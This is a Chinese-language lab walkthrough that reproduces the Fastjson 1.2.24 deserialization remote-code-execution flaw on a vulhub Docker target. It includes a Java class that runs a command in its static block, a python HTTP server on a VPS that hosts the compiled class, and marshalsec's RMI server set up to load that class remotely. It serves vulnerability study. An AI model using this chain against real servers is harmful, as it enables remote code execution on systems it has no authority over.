前言:
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。
Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
Fastjson 特性:
提供服务器端、安卓客户端两种解析工具,性能表现较好。
提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。
允许转换预先存在的无法修改的对象(只有class、无源代码)。
Java泛型的广泛支持。
允许对象的自定义表示、允许自定义序列化类。
支持任意复杂对象(具有深厚的继承层次和广泛使用的泛型类型)
复现环境、工具:
jdk环境
Maven环境
攻击机:192.168.31.159(win10)
靶机:192.168.30.128:8090(kali虚拟机通过docker搭建fastjson环境)
http、rmi服务:106.13.9.xx(VPS服务器)
第一步:
kali安装docker后下载靶场环境vulhub:
https://blog.csdn.net/SuPejkj/article/details/103707207
cd /vulhub/fastjson/1.2.24-rce
docker-compose up -d
第二步:此时kali中docker中已经启动了fastjson1.2.24环境,查看Kali地址通过浏览器访问。
第三步:jdk和Maven环境环境搭建,这里百度一抓一大把,就不在此处进行阐述了。
漏洞复现(dnslog回显)
保存以下代码为Jimolang.java
文件(这里文件名一定要和public class Jimolang类名报保持一致):
import java.lang.Runtime;
import java.lang.Process;
public class Jimolang{
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"ping", "xxx.dnslog.cn"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
这里注意代码中的{"ping", "xxx.dnslog.cn"}
xxx.dnslog.cn就是我们的dnslog平台地址。
通过javac来编译当前java文件生成Jimolang.class文件(由于执行javac需要jdk环境,所以在第三步的时候需要安装jdk环境)
javac Jimolang.java
第四步:把生成的Jimolang.class文件传到公网vps中(我这里是公网的vps),然后在Jimolang.class目录中通过python3启动一个简单的http服务,命令如下:
python3 -m http.server 80
第五步:使用marshalsec项目,在公网的VPS中启动RMI服务,并且监听9999端口远程加载Jimolang.class类。
github项目地址:
git clone https://github.com/mbechler/marshalsec.git
下载完成后cd进入到marshalsec项目文件里,用刚刚安装好的maven环境执行如下命令进行编译,编译成功会生成一个target目录,出现如下编译成功。
mvn clean package -DskipTests
编译成功了以后会生成一个target目录,target目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar文件。
第六步:启动RMI服务,执行命令如下:
cd target/
java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.RMIRefServer “http://刚刚上传的Jimolang.class的vps地址/#Jimolang” 9999
到此为止,我们的攻击环境已经准备好了,访问目标地址后通过burp抓包,然后构造payload执行即可。
查看dnslog查看存在回显记录。
查看vps上http服务请求日志,成功请求并且加载了Jimoalng.class类文件。